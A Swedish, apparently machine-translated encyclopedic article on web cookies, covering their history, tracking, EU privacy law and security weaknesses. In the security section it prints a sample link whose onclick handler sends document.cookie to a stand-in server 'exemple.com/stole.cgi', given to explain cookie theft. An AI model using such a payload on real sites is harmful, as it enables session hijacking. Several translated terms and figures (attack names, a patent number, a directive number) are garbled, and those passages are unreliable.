Internetkaka: Vad är det? Definition, ursprung, typer och sekretess 🍪

Un cookie eller webbcookie (Eller kaka, förkortat som vittne i Quebec) definieras av HTTP-kommunikationsprotokollet som en sekvens av information som skickas av en HTTP-server till en HTTP-klient, som den senare returnerar varje gång samma HTTP-server frågas under vissa förhållanden.

Cookien motsvarar en liten textfil lagrad på terminalen av internetanvändaren. De har funnits i mer än 20 år och tillåter webbutvecklare att lagra användardata för att underlätta deras navigering och tillåta vissa funktioner. Cookies har alltid varit mer eller mindre kontroversiella eftersom de innehåller återstående personlig information som potentiellt kan utnyttjas av tredje part.

Den skickas som en HTTP-header av webbservern till webbläsaren som returnerar den oförändrad varje gång den går in på servern. En kaka kan användas för att en autentisering, en session (statligt underhåll), och för lagra specifik information om användaren, till exempel webbplatspreferenser eller innehållet i en elektronisk kundvagn. Termen cookie kommer från magisk kaka, ett välkänt koncept inom UNIX-datorer, som inspirerade idén och namnet på webbläsarcookies. Det finns några få alternativ till cookies, var och en med sina egna användningsområden, fördelar och nackdelar.

Eftersom cookies är enkla textfiler är de inte körbara. De är inte varken spionprogram eller virus, även om cookies från vissa webbplatser upptäcks av många antivirusprogram eftersom de tillåter användare att spåras när de besöker flera webbplatser.

De flesta moderna webbläsare tillåter användare att bestämma om du vill acceptera eller avvisa cookies. Användare kan också välja hur länge cookies lagras. Det totala avslaget på cookies gör dock vissa webbplatser oanvändbara. Till exempel, lagra kundvagnar eller webbplatser som kräver inloggning med hjälp av referenser (användarnamn och lösenord).

Historique

termen kaka kommer från den engelska termen magisk kaka, vilket är ett datapaket som ett program tar emot och returnerar oförändrat. Cookies användes redan i IT när Lou Montulli hade idén att använda dem i webbkommunikation i juni 1994. Då var han anställd av Netscape Communications som hade utvecklat en e-handelsapplikation för en kund. Cookies gav en lösning på problemet med tillförlitligheten hos en butiks virtuella kundvagnsimplementering.

John Giannandrea och Lou Montulli skrev Netscapes första cookiespecifikation samma år. Version 0.9 beta av Mosaic Netscape, släppt den 13 oktober 1994, integrerad cookie-teknik (se inlägg). Den första (icke-experimentella) användningen av cookies var att avgöra om besökare på Netscapes webbplats hade besökt webbplatsen tidigare. Montulli lämnade in en patentansökan för cookie-teknologi 1995, och USA-patentet 5774670 XNUMX XNUMX beviljades. beviljades 1998.

Efter att ha implementerats i Netscape 0.9 beta 1994, integrerades cookies i Internet Explorer 2, som släpptes i oktober 1995.

Införandet av cookies har ännu inte varit allmänt känt för allmänheten. I synnerhet accepterades cookies som standard i webbläsarinställningarna och användarna informerades inte om deras närvaro. Vissa människor var medvetna om förekomsten av cookies runt första kvartalet 1995, men allmänheten tog till sig deras existens först efter att Financial Times publicerade en artikel den 12 februari 1996. Samma år fick cookies stor uppmärksamhet i media på grund av eventuella integritetsintrång. Ämnet för cookies diskuterades i två samråd med American Federal Trade Commission 1996 och 1997.

Utvecklingen av den officiella cookiespecifikationen var redan igång. De första diskussionerna om den officiella specifikationen ägde rum i april 1995 på e-postlistan www-talk. En särskild IETF-arbetsgrupp bildades. Två alternativa förslag för att införa statliga till HTTP-transaktioner föreslogs av Brian Behlendorf respektive David Kristol, men gruppen, ledd av Kristol själv, bestämde sig för att använda Netscapes specifikation som utgångspunkt. I februari 1996 fastställde arbetsgruppen att tredjepartscookies var ett betydande hot mot integriteten. Specifikationen som tagits fram av gruppen publicerades så småningom som RFC 2109.

Från slutet av 2014 ser vi en banner om cookies på många sajter. Det finns minst ett webbläsartillägg som tillåter banner visas inte.

Typer av cookies och användningar

Sessionshantering

Cookies kan användas för att upprätthålla användardata under navigering, men även vid flera besök. Cookies introducerades för att tillhandahålla ett sätt att implementera elektroniska kundvagnar, en virtuell enhet där användaren kan samla de varor han vill köpa medan han surfar på webbplatsen.

Nuförtiden lagrar appar som kundvagnar istället listan över föremål i en databas på en server, vilket är att föredra; än att spara dem i själva kakan. Webbservern skickar en cookie som innehåller ett unikt sessions-ID. Webbläsaren returnerar sedan detta sessions-ID vid varje efterföljande begäran och objekten i korgen sparas och associeras med samma unika sessions-ID.

Frekvent användning av cookies är användbart för att logga in på en webbplats med hjälp av referenser. Kort sagt, webbservern skickar först en cookie som innehåller ett unikt sessions-ID. Sedan anger användarna sina referenser (vanligtvis ett användarnamn och lösenord). Webbapplikationen autentiserar sedan sessionen och låter användaren komma åt tjänsten.

personalisering

Cookies kan användas för att komma ihåg information om användaren av en webbplats, för att visa honom lämpligt innehåll i framtiden. Till exempel kan en webbserver skicka en cookie som innehåller det senaste användarnamnet som användes för att logga in på den webbplatsen, så att användarnamnet kan fyllas i i förväg vid framtida besök.

Många webbplatser använder cookies för personalisering baserat på användarpreferenser. Användare väljer sina preferenser i ett formulär och skickar in dessa till servern. Servern kodar inställningarna i en cookie och skickar tillbaka den till webbläsaren. Därefter, varje gång användaren går in på en sida på denna webbplats, returnerar webbläsaren cookien och därmed listan med preferenser; servern kan sedan anpassa sidan enligt användarens preferenser. Till exempel tillåter Wikipedias webbplats sina användare att välja skalet på webbplatsen de föredrar. Googles sökmotor låter sina användare (även om de inte är registrerade) välja hur många resultat de vill se på varje resultatsida.

Spårning

Spårningscookies används för att spåra internetanvändares surfvanor. Detta kan också delvis göras genom att använda IP-adressen till datorn som gör en begäran om en sida eller genom att använda HTTP-huvudet "referrer" som klienten skickar med varje begäran, men cookies möjliggör större precision. Detta kan göras som i följande exempel:

Om användaren ringer upp en sida på en webbplats och begäran inte innehåller en cookie, antar servern att detta är den första sidan som användaren besöker. Servern skapar sedan en slumpmässig sträng och skickar den till webbläsaren tillsammans med den begärda sidan.
Från och med detta ögonblick kommer cookien automatiskt att skickas av webbläsaren varje gång en ny sida på webbplatsen anropas. Servern kommer att skicka sidan som vanligt, men kommer också att logga webbadressen till den anropade sidan, datum, tidpunkt för begäran och cookien i en loggfil.

Genom att titta på loggfilen går det sedan att se vilka sidor användaren har besökt och i vilken ordning. Till exempel, om filen innehåller några förfrågningar gjorda med hjälp av id=abc-cookien, kan detta fastställa att alla dessa förfrågningar kommer från samma användare. Den begärda webbadressen, datum och tid som är kopplade till förfrågningarna gör att användarens surfning kan spåras.

Tredjepartscookies och webbbeacons, som förklaras nedan, möjliggör dessutom spårning över olika webbplatser. Spårning av en enda webbplats används vanligtvis för statistiska ändamål. Däremot används spårning över olika webbplatser med hjälp av tredjepartscookies i allmänhet av reklamföretag för att skapa anonyma användarprofiler (som sedan används för att bestämma vilka annonser som ska visas för användaren samt för att skicka honom e-postmeddelanden som motsvarar dessa annonser — SPAM ).

Spårningscookies är en risk för intrång i användarnas integritet men de kan enkelt raderas. De flesta moderna webbläsare inkluderar ett alternativ för att automatiskt radera beständiga cookies när applikationen stängs.

Tredjepartscookies

Bilder och andra objekt som finns på en webbsida kan finnas på andra servrar än den som är värd för sidan. För att visa sidan laddar webbläsaren ner alla dessa objekt. De flesta webbplatser innehåller information från olika källor. Om du till exempel skriver www.example.com i din webbläsare, kommer det ofta att finnas objekt eller annonser på en del av sidan som kommer från olika källor, det vill säga från en annan domän än www. .example.com. "Förstapartscookies" är cookies som ställs in av den domän som anges i webbläsarens adressfält. Tredjepartscookies ställs in av ett av sidobjekten som kommer från en annan domän.

Som standard accepterar webbläsare som Mozilla Firefox, Microsoft Internet Explorer och Opera tredjepartscookies, men användare kan ändra inställningarna i webbläsaralternativen för att blockera dem. Det finns ingen säkerhetsrisk med tredjepartscookies som möjliggör webbfunktionalitet, men de används också för att spåra användare. från plats till plats.

Verktyg som Ghostery tillgängliga för alla webbläsare inklusive Google Chrome kan blockera utbyten mellan tredje part.

Genomförande

En möjlig interaktion mellan en webbläsare och servern som är värd för webbsidan. Servern skickar en cookie till webbläsaren och webbläsaren skickar tillbaka den när den anropar en annan sida.

Cookies är små databitar som skickas av webbservern till webbläsaren. Webbläsaren returnerar dem oförändrade till servern och introducerar tillstånd (minne av tidigare händelser) i den annars tillståndslösa HTTP-transaktionen. Utan cookies är varje hämtning av en webbsida eller en komponent av en webbsida en isolerad händelse, oberoende av andra förfrågningar som görs till samma webbplats. Förutom att kunna ställas in av webbservern kan cookies även ställas in av skriptspråk som JavaScript, om webbläsaren stöder och godkänner dem.

Den officiella cookiespecifikationen föreslår att webbläsare ska kunna spara och skicka om ett minsta antal cookies. Specifikt bör en webbläsare kunna lagra minst 300 cookies på fyra kilobyte vardera och minst 20 cookies för en enda server eller domän.

Enligt avsnitt 3.1 i RFC 2965, cookienamn är skiftlägesokänsliga.

En cookie kan ange datumet för dess utgång, i vilket fall cookien kommer att raderas detta datum. Om cookien inte anger ett utgångsdatum, raderas cookien så snart användaren lämnar sin webbläsare. Därför är att ange ett utgångsdatum ett sätt att få kakan att överleva genom flera sessioner. Av denna anledning sägs cookies med ett utgångsdatum vara ihållande. Ett exempel på applikation: en återförsäljarwebbplats kan använda beständiga cookies för att registrera de varor som användare har lagt i sin kundvagn (i verkligheten kan cookien referera till en post som sparats i en databas på försäljningsplatsen och inte på din dator) . På detta sätt, om användare lämnar sin webbläsare utan att göra ett köp och återvänder till den senare, kommer de att kunna hitta varorna i varukorgen igen. Om dessa cookies inte gav ett utgångsdatum, skulle de förfalla när webbläsaren stängdes, och informationen om innehållet i varukorgen skulle gå förlorad.

Cookies kan begränsas i omfattning till en specifik domän, underdomän eller sökväg på servern som skapade dem.

Överföringen av webbsidor görs med hjälp av HyperText Transfer Protocol (HTTP). Genom att ignorera cookies anropar webbläsare en sida från webbservrar genom att vanligtvis skicka en kort text som kallas HTTP-förfrågan. För att till exempel komma åt sidan www.example.org/index.html ansluter webbläsare till servern www.example.org och skickar en begäran som ser ut så här:

	Hämta /index.html HTTP/1.1 Värd: www.example.org
Navigateur	→	serveur

Servern svarar genom att skicka den begärda sidan, föregås av en liknande text, hela anropas HTTP-svar. Detta paket kan innehålla rader som instruerar webbläsaren att lagra cookies:

	HTTP/1.1 200 OKContent-type: text/htmlSet-Cookie: name=value (HTML-sida)
Navigateur	←	serveur

Servern skickar bara Set-Cookie-raden om servern vill att webbläsaren ska lagra en cookie. Set-Cookie är en begäran för webbläsaren att lagra namn=värde-strängen och returnera den i alla framtida förfrågningar till servern. Om webbläsaren stöder cookies och cookies är aktiverade i webbläsaralternativen, kommer cookien att inkluderas i alla efterföljande förfrågningar som görs till samma server. Till exempel anropar webbläsaren sidan www.example.org/news.html genom att skicka följande begäran till servern www.example.org:

	GET /news.html HTTP/1.1Värd: www.example.orgCookie: namn=värdeAcceptera: /
Navigateur	→	serveur

Detta är en begäran om en annan sida från samma server och skiljer sig från den första ovan eftersom den innehåller en sträng som servern tidigare skickat till webbläsaren. Tack vare detta sätt vet servern att denna begäran är kopplad till den föregående. Servern svarar genom att skicka den anropade sidan, och även genom att lägga till andra cookies till den.

Värdet på cookien kan ändras av servern genom att skicka en ny rad Set-Cookie: name=new_value som svar på den anropade sidan. Webbläsaren ersätter sedan det gamla värdet med det nya.

Set-Cookie-raden skapas vanligtvis av ett CGI-program eller annat skriptspråk, inte av HTTP-servern. HTTP-servern (exempel: Apache) kommer endast att överföra resultatet av programmet (ett dokument som föregås av rubriken som innehåller cookies) till webbläsaren.

Cookies kan också ställas in av JavaScript eller andra liknande språk som körs i webbläsaren, det vill säga på klientsidan snarare än serversidan. I JavaScript används objektet document.cookie för detta ändamål. Till exempel skapar uttalandet document.cookie = "temperatur=20" en cookie med namnet "temperatur" och med värdet 20.

Exempel på ett HTTP-svar från google.com, som ställer in en cookie med attribut.

Utöver namn/värdeparet kan en cookie även innehålla ett utgångsdatum, en sökväg, ett domännamn och vilken typ av anslutning som är avsedd, d.v.s. normal eller krypterad. RFC 2965 definierar också att cookies måste ha ett obligatoriskt versionsnummer, men detta utelämnas i allmänhet. Dessa datadelar följer paret name=new_value och separeras med semikolon. Till exempel kan en cookie skapas av servern genom att skicka en Set-Cookie-rad: name=new_value; expires=date; sökväg=/; domän=.exempel.org.

Cookies upphör att gälla och skickas sedan inte av webbläsaren till servern i följande situationer:

När webbläsaren är stängd, om cookien inte är beständig.
När cookiens utgångsdatum har passerat.
När cookiens utgångsdatum ändras (av servern eller skriptet) till ett datum i det förflutna.
När webbläsaren tar bort cookien på begäran av användaren.

Den tredje situationen tillåter servrar eller skript att explicit radera en cookie. Observera att det är möjligt med webbläsaren Google Chrome att veta utgångsdatumet för en viss cookie genom att gå till innehållsinställningarna. En cookie som sparas på en dator kan mycket väl finnas kvar där i flera decennier om ingen procedur vidtas för att radera den.

Stereotyper

Sedan deras introduktion på Internet har många idéer om cookies cirkulerat på Internet och i media. År 1998 fastställde CIAC, ett team för övervakning av datorincidenter från det amerikanska energidepartementet, att säkerhetssårbarheter för cookies var "i huvudsak obefintliga" och förklarade att "information om ursprunget till dina besök och detaljerna om de webbsidor du har besökt finns redan i loggfilerna på webbservrarna”. År 2005 publicerade Jupiter Research resultaten av en studie, där en betydande andel av de tillfrågade ansåg följande påståenden:

Cookies är som virus, de infekterar användarnas hårddiskar.
Cookies genererar pop-up.
Cookies används för att skicka skräppost.
Cookies används endast för reklam.

Cookies kan inte radera eller läsa information från användarens dator. Cookies gör det dock möjligt att upptäcka de webbsidor som besöks av en användare på en viss webbplats eller uppsättning webbplatser. Denna information kan samlas in i en användarprofil som kan användas eller säljas vidare till tredje part, vilket kan orsaka allvarliga integritetsproblem. Vissa profiler är anonyma, i den meningen att de inte innehåller någon personlig information, men även sådana profiler kan vara tveksamma.

Enligt samma studie vet en stor andel av internetanvändarna inte hur man tar bort cookies. En av anledningarna till att folk inte litar på cookies är att vissa webbplatser har missbrukat den personligt identifierande aspekten av cookies och delat denna information med andra källor. En stor andel av riktad reklam och oönskad e-post, som anses vara skräppost, kommer från information från spårningscookies.

Webbläsarinställningar

De flesta webbläsare stöder cookies och tillåter användaren att inaktivera dem. De vanligaste alternativen är:

Aktivera eller inaktivera cookies helt, så att de ständigt accepteras eller blockeras.
Tillåt användaren att se de aktiva kakorna på en given sida genom att ange javascript: alert(document.cookie) i webbläsarens adressfält. Vissa webbläsare har en cookiehanterare för användaren som kan se och selektivt radera cookies som för närvarande lagras av webbläsaren.

De flesta webbläsare tillåter också fullständig radering av personuppgifter som inkluderar cookies. Ytterligare moduler för att kontrollera cookie-behörigheter finns också.

Sekretess och tredjepartscookies

I detta fiktiva exempel har ett reklamföretag placerat banners på två webbplatser. Genom att vara värd för banners på sina servrar och använda tredjepartscookies, kan reklamföretaget spåra användarens navigering genom dessa två webbplatser.

Cookies har viktiga konsekvenser för webbanvändarnas integritet och anonymitet. Även om cookies endast skickas tillbaka till servern som ställer in dem eller till en server som tillhör samma internetdomän, kan en webbsida dock innehålla bilder eller andra komponenter lagrade på servrar som tillhör andra domäner. De cookies som ställs in under återställningen av dessa externa komponenter kallas tredjepartscookies. Detta inkluderar cookies från oönskade popup-fönster.

Annonsföretag använder tredjepartscookies för att spåra användare på de olika webbplatserna de besöker. I synnerhet kan ett reklamföretag spåra en användare på alla sidor där det har placerat reklambilder eller en spårningspixel. Kunskap om de sidor som användaren besöker gör att reklamföretaget kan rikta in sig på användarens reklampreferenser.

Möjligheten att bygga en användarprofil anses av vissa vara en integritetskränkning, särskilt när spårning görs över olika domäner med hjälp av tredjepartscookies. Av denna anledning har vissa länder cookielagstiftning.

Förenta staternas regering införde strikta regler för placering av cookies år 2000, efter att det avslöjades att Vita husets narkotikapolitiska kontor använde cookies för att spåra datorer för användare som tittade på narkotikareklam online. 2002 upptäckte integritetsaktivisten Daniel Brandt att CIA lämnade beständiga cookies på datorer som hade besökt dess webbplatser. När CIA väl informerades om detta intrång deklarerade de att dessa cookies inte skickades avsiktligt och upphörde att placera dem. Den 25 december 2005 upptäckte Brandt att National Security Agency (NSA) hade lämnat två beständiga cookies på besökarnas datorer på grund av en mjukvaruuppdatering. Efter att ha blivit underrättad inaktiverade NSA omedelbart cookies.

I Storbritannien, Cookielag ", som trädde i kraft den 25 maj 2012, ålägger sajterna att deklarera sina avsikter, vilket gör det möjligt för användarna att välja om de vill lämna spår eller inte av sin passage på Internet. De kan därmed skyddas från reklaminriktning. Dock, enligt The Guardian, Internetanvändares samtycke är inte nödvändigtvis explicit; ändringar har gjorts i villkoren för användarens samtycke, vilket gör det alltså underförstått.

Direktiv 2002/58 om integritet

Direktiv 202/58 integritet och elektronisk kommunikation, innehåller regler om användning av cookies. I synnerhet kräver artikel 5, punkt 3 i detta direktiv att lagring av data (såsom cookies) i användarens dator endast kan göras om:

användaren informeras om hur uppgifterna används;
användaren ges möjlighet att vägra denna lagringsoperation. Men i denna artikel anges också att lagring av uppgifter av tekniska skäl är undantagen från denna lag.

Direktivet, som skulle implementeras från oktober 2003, genomfördes dock endast mycket ofullständigt i praktiken enligt en rapport från december 2004, som också påpekade att vissa medlemsstater (Slovakien, Lettland, Grekland, Belgien och Luxemburg) ännu inte hade införlivat direktiv i nationell lagstiftning.

Enligt åsikten från G29 2010, tillämpas detta direktiv, som framför allt villkorar användningen av cookies för beteendebaserad reklam, med uttryckligt samtycke från internetanvändaren, mycket dåligt. Faktum är att de flesta sajter gör det på ett sätt som inte följer direktivet, genom att begränsa sig till en enkel "banner" som informerar om användningen av "cookies" utan att ge information om användningen, utan att skilja mellan "tekniska" cookies. "spårnings"-cookies, inte heller för att erbjuda ett verkligt val till användaren som vill behålla tekniska cookies (såsom kundvagnshanteringscookies) och vägra "spårnings"-cookies. Faktum är att många webbplatser inte fungerar korrekt om cookies vägras, vilket inte överensstämmer med direktiv 2002/58 eller direktiv 95/46 (Skydd av personuppgifter).

Direktiv 2009 / 136 / CE

Detta material har uppdaterats genom direktiv 2009/136/EG daterat den 25 november 2009 som säger att "lagring av information, eller att få tillgång till information som redan finns lagrad, i en abonnents eller användares terminalutrustning är endast tillåten under förutsättning att abonnenten eller användaren har gett sitt samtycke, efter att ha mottagit, i enlighet med direktiv 95/46/EG, tydlig och fullständig information mellan andra om syftet med behandlingen”. Det nya direktivet stärker därför skyldigheterna inför placering av cookies på internetanvändarens dator.

I de preliminära övervägandena av direktivet specificerar den europeiska lagstiftaren dock: "Där det är tekniskt möjligt och effektivt, i enlighet med relevanta bestämmelser i direktiv 95/46/EG, får användarens samtycke med avseende på behandlingen uttryckas genom användning av lämpliga inställningar för en webbläsare eller annan applikation”. Men faktiskt, ingen webbläsare hittills gör det möjligt att skilja de väsentliga tekniska cookies från de valfria som bör överlåtas till användarens val.

Detta nya direktiv införlivades av belgiska parlamentsledamöter i juli 2012. En studie från 2014 visar att även parlamentsledamöter kämpar för att ansöka direktivets begränsningar.

P3P

P3P-specifikationen inkluderar möjligheten för en server att ange en integritetspolicy, som definierar vilken typ av information den samlar in och för vilket ändamål. Dessa policyer inkluderar (men är inte begränsade till) användningen av information som samlas in med hjälp av cookies. Enligt definitionerna av P3P kan en webbläsare acceptera eller avvisa cookies genom att jämföra integritetspolicyn med användarens preferenser eller genom att fråga användaren och presentera integritetspolicyn som deklarerats av servern.

Många webbläsare, inklusive Apple Safari och Microsoft Internet Explorer version 6 och 7, stöder P3P som gör att webbläsaren kan avgöra om den ska acceptera tredjepartslagring av cookies. Opera-webbläsaren tillåter användare att vägra cookies från tredje part och att skapa en global och specifik säkerhetsprofil för internetdomäner. Mozilla Firefox version 2 tappade P3P-stöd men återställde det i version 3.

Tredjepartscookies kan blockeras av de flesta webbläsare för att öka integriteten och minska annonsspårningen, utan att negativt påverka användarens webbupplevelse. Många reklambyråer erbjuder ett alternativ välja bort till riktad reklam, genom att sätta upp en generisk cookie i webbläsaren som inaktiverar denna inriktning, men en sådan lösning är inte praktiskt effektiv, när den respekteras, eftersom denna generiska cookie raderas så snart användaren tar bort dessa cookies vilket avbryter valet ut beslut.

Nackdelar med cookies

Förutom integritetsproblem har cookies även vissa tekniska nackdelar. I synnerhet identifierar de inte alltid användare korrekt, de kan bromsa webbplatsens prestanda i stort antal, de kan användas för säkerhetsattacker och de kommer i konflikt med den representativa tillståndsöverföringen, arkitektoniska stilen för programvaran.

Oprecis identifiering

Om mer än en webbläsare används på en dator, finns det i var och en av dem alltid en separat lagringsenhet för cookies. Cookies identifierar därför inte en person, utan kombinationen av ett användarkonto, en dator och en webbläsare. Således kan vem som helst använda dessa konton, datorer eller webbläsare som har en mängd cookies. På samma sätt gör cookies ingen skillnad mellan flera användare som delar samma användarkonto, dator och webbläsare, till exempel på "internetkaféer" eller någon annan plats som ger fri tillgång till datorresurser.

Men i praktiken visar sig detta uttalande vara felaktigt i de flesta fall eftersom idag en "personlig" dator (eller en smartphone eller surfplatta, vilket är värre) huvudsakligen används av en enskild individ. Detta innebär att rikta in sig på en specifik person och genom mängden information som samlas in, komma fram till personlig inriktning även om personen inte är "nämligen" identifierad.

En cookie kan stjälas av en annan dator i nätverket.

Under normal drift skickas cookies tillbaka mellan servern (eller en grupp servrar i samma domän) och användarens datorwebbläsare. Eftersom cookies kan innehålla känslig information (användarnamn, ett lösenord som används för autentisering, etc.), bör deras värden inte vara tillgängliga för andra datorer. Cookiestöld är en handling där en obehörig tredje part avlyssnar cookies.

Cookies kan stjälas via en paketsniffer i en attack som kallas sessionskapning. Trafik på nätet kan fångas upp och läsas av andra datorer än de som sänder och tar emot (särskilt på det okrypterade offentliga Wi-Fi-utrymmet). Denna trafik inkluderar cookies som skickas över sessioner med det vanliga HTTP-protokollet. När nätverkstrafiken inte är krypterad kan illvilliga användare alltså läsa kommunikationen från andra användare på nätverket med hjälp av "paketsniffer".

Detta problem kan lösas genom att kryptera anslutningen mellan användarens dator och servern med hjälp av HTTPS-protokollet. En server kan ange en säker flagga medan du ställer in en cookie; webbläsaren skickar det bara över en säker linje, till exempel en SSL-anslutning.

Men många webbplatser, även om de använder HTTPS-krypterad kommunikation för användarautentisering (dvs. inloggningssidan), skickar senare sessionscookies och annan data som vanligt, genom okrypterade HTTP-anslutningar av effektivitetsskäl. Angripare kan alltså fånga upp andra användares cookies och utge sig för att vara dem på lämpliga webbplatser eller använda dem i cookie-attacker.

Skriptning på webbplatsen: en cookie som endast ska utbytas mellan servern och klienten skickas till en annan tredje part.

Ett annat sätt att stjäla cookies är att skripta webbplatser och låta webbläsaren själv skicka cookies till skadliga servrar som aldrig tar emot dem. Moderna webbläsare tillåter exekvering av eftertraktade delar av koden från servern. Om cookies nås under körning, kan deras värden kommuniceras i någon form till servrar som inte bör komma åt dem. Att kryptera cookies innan de skickas över nätverket hjälper inte till att förhindra attacken.

Denna typ av in-site scripting används vanligtvis av angripare på webbplatser som tillåter användare att lägga upp HTML-innehåll. Genom att integrera en del av kompatibel kod i HTML-bidraget kan en angripare ta emot cookies från andra användare. Kunskap om dessa cookies kan användas genom att ansluta till samma webbplats med hjälp av de stulna cookies, och därmed identifieras som användaren vars cookies stals.

Ett sätt att förhindra sådana attacker är att använda flaggan HttpOnly; det är ett alternativ, introducerat sedan version 6 av Internet Explorer i PHP sedan version 5.2.0 som är planerat att göra cookien oåtkomlig för klienten nära skriptet. Däremot bör webbutvecklare ta hänsyn till detta i sin webbplatsutveckling så att de är immuna mot skript på webbplatsen.

Ett annat säkerhetshot som används är efterfrågetillverkning på sajten.

Den officiella tekniska specifikationen tillåter att cookies skickas tillbaka endast till servrar på den domän de kommer från. Värdet av cookies kan dock skickas till andra servrar med andra medel än cookie-rubriker.

I synnerhet tillåts skriptspråk som JavaScript i allmänhet att komma åt cookie-värden och kan skicka godtyckliga värden till vilken server som helst på Internet. Denna skriptfunktion används från webbplatser som tillåter användare att lägga upp HTML-innehåll för andra användare att se.

Till exempel kan en angripare som verkar på domänen example.com posta en kommentar som innehåller följande länk som pekar på en populär blogg som de annars inte kontrollerar:

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

När en annan användare klickar på den här länken, kör webbläsaren onclick-attributdelen av koden, så den ersätter strängen document.cookie med listan över användarcookies som är aktiva för den här sidan. Därför skickas denna lista med cookies till exempel.com-servern, och angriparen kan därför samla in denna användares cookies.

Denna typ av attack är svår att upptäcka på användarsidan eftersom skriptet kommer från samma domän som satte cookien, och operationen för att skicka värdena verkar vara auktoriserad av den domänen. Det anses att det är de administratörer som driver denna typ av webbplatser som ansvarar för att införa begränsningar som förhindrar publicering av skadlig kod.

Cookies är inte direkt synliga för program på klientsidan som JavaScript om de skickades med HttpOnly-flaggan. Ur serverns synvinkel är den enda skillnaden att i raden i Set-Cookie-huvudet läggs ett nytt fält till som innehåller strängen HttpOnly:

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

När webbläsaren tar emot en sådan cookie är det meningen att den ska använda den normalt i följande HTTP-utbyte, men utan att göra den synlig för skript som körs på klientsidan. HttpOnly-flaggan är inte en del av någon officiell teknisk specifikation och är inte implementerad i alla webbläsare. Observera att det för närvarande inte finns något sätt att förhindra läsning och skrivning av sessionscookies med metoden XMLHTTPRequest.

Ändring av innehåll: en angripare skickar en ogiltig cookie till en server, möjligen gjord av en giltig cookie som skickas av servern.

Så snart cookies behöver lagras och returneras oförändrade till servern kan en angripare ändra värdet på cookies innan de skickas tillbaka till servern. Till exempel, om en cookie innehåller det totala värdet som användaren måste betala för varorna som placeras i butikens kundvagn, utsätter en ändring av detta värde servern för risken att debitera angriparen mindre än utgångspriset. Processen att ändra värdet på cookies kallas kakförgiftning och kan användas efter kakstöld för att göra attacken ihållande.

I cookie-override-metoden utnyttjar angriparen ett webbläsarfel för att skicka en ogiltig cookie till servern.

De flesta webbplatser lagrar dock bara ett sessions-ID – ett slumpmässigt genererat unikt nummer som används för att identifiera sessionsanvändaren – i själva cookien, medan all annan information lagras på servern. I det här fallet är detta problem till stor del löst.

Varje webbplats förväntas ha sina egna cookies, så en webbplats ska inte kunna ändra eller skapa cookies kopplade till en annan webbplats. Ett säkerhetsfel i webbläsaren kan göra att skadliga webbplatser bryter mot denna regel. Utnyttjandet av ett sådant fel kallas vanligtvis matlagning över platsen. Syftet med sådana attacker kan vara stöld av sessions-ID.

Användare bör använda de senaste versionerna av webbläsare där dessa sårbarheter praktiskt taget är eliminerade.

Konflikttillstånd mellan klient och server

Användningen av cookies kan skapa en motsägelse mellan klientens tillstånd och det tillstånd som lagras i cookien. Om användaren skaffar en cookie och klickar på "Tillbaka"-knappen i webbläsaren, är webbläsarens tillstånd i allmänhet inte detsamma som före detta förvärv. Till exempel, om varukorgen i en onlinebutik skapas med hjälp av cookies, kan innehållet i varukorgen inte ändras när användaren återvänder till webbläsarhistoriken: om användaren trycker på en knapp för att lägga till en artikel i sin varukorg och klickar på "Return". "-knappen, artikeln finns kvar i den här. Detta kanske inte är användarens avsikt, som verkligen vill avbryta tillägget av artikeln. Detta kan leda till opålitlighet, förvirring och buggar. Så webbutvecklare bör vara medvetna om detta problem och vidta åtgärder för att hantera situationer som denna.

Beständiga cookies har kritiserats av sekretesssäkerhetsexperter för att de inte är inställda på att löpa ut tillräckligt snabbt, vilket gör att webbplatser kan spåra användare och bygga upp deras profil över tid. Denna aspekt av cookies är också en del av sessionskapningsproblemet, eftersom en stulen persistent cookie kan användas för att imitera en användare under en längre tid.

Läs också: GAFAM: vilka är de? Varför är de (ibland) så läskiga?

Alternativ till cookies

Vissa operationer som kan utföras med hjälp av cookies kan också utföras med andra mekanismer som kringgår cookies eller återskapar raderade cookies, vilket skapar sekretessproblem på samma sätt (eller ibland värre eftersom de då är osynliga) än cookies.

IP-adress

Användare kan spåras med IP-adressen till den dator som ringer sidan. Denna teknik har varit tillgänglig sedan introduktionen av World Wide Web, eftersom sidor laddas ner begär servern IP-adressen till den dator som kör webbläsaren eller proxyn, om ingen används. Servern kan spåra denna information oavsett om det finns cookies som används eller inte. Dessa adresser är dock vanligtvis mindre tillförlitliga för att identifiera en användare än cookies eftersom datorer och proxyservrar kan delas av flera användare, och samma dator kan få en annan IP-adress vid varje arbetssession (som c ofta är fallet för telefonanslutningar) .

Spårning av IP-adresser kan vara tillförlitlig i vissa situationer, till exempel bredbandsanslutningar som bibehåller samma IP-adress under lång tid, så länge som strömmen är på.

Vissa system som Tor är utformade för att upprätthålla anonymiteten på Internet och göra spårning med IP-adress omöjlig eller opraktisk.

URL

En mer exakt teknik bygger på att bädda in information i webbadresser. Frågesträngsdelen av URL:en är en teknik som vanligtvis används för detta ändamål, men andra delar kan också användas. Både Java-serverlet och PHP-sessionsmekanismerna använder denna metod om cookies inte är aktiverade.

Denna metod innebär att webbservern lägger till strängförfrågningar till länkarna på webbsidan som bär den när den skickas till webbläsaren. När användaren följer en länk returnerar webbläsaren den bifogade frågesträngen till servern.

Frågesträngar som används för detta ändamål och cookies är mycket lika, båda är information godtyckligt vald av servern och returneras av webbläsaren. Det finns dock vissa skillnader: när en URL som innehåller en frågesträng återanvänds skickas samma information till servern. Till exempel, om en användares inställningar är kodade i en frågesträng för en URL och användaren skickar den URL:en till en annan användare via e-post, kommer den användaren också att kunna använda dessa inställningar.

Å andra sidan, när en användare öppnar samma sida två gånger, finns det ingen garanti för att samma frågesträng kommer att användas båda gångerna. Till exempel, om en användare landar på en sida från en intern webbplatssida första gången och landar på samma sida från en extern sida andra gången, är frågesträngen i förhållande till webbplatssidan vanligtvis annorlunda, medan cookies är desamma .

Andra nackdelar med frågesträngar är relaterade till säkerhet: att behålla data som identifierar en session i frågesträngar möjliggör eller förenklar sessionsfixeringsattacker, identifierarreferensattacker och andra utnyttjande. Att skicka sessions-ID:n som HTTP-cookies är säkrare.

Dolt formulärfält

